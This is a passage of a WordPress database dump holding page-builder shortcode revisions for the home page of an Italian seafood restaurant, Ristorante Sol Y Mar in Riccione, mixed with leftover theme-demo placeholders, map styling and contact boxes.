congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_testimonials skin=\"\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" slider_pagination=\"no\" number=\"6\" category=\"testimonials-1\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2020-12-05 17:31:29','2020-12-05 16:31:29','',3040,'https://www.ristorantesolymar.it/2020/12/05/3040-revision-v1/',0,'revision','',0),(3359,1,'2020-12-05 17:34:32','2020-12-05 16:34:32','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2910\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"773\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.\r\nCucina di Pesce, proposte vegetariane\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]\r\n<div dir=\"auto\">e proposte vegetariane</div>\r\n[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" 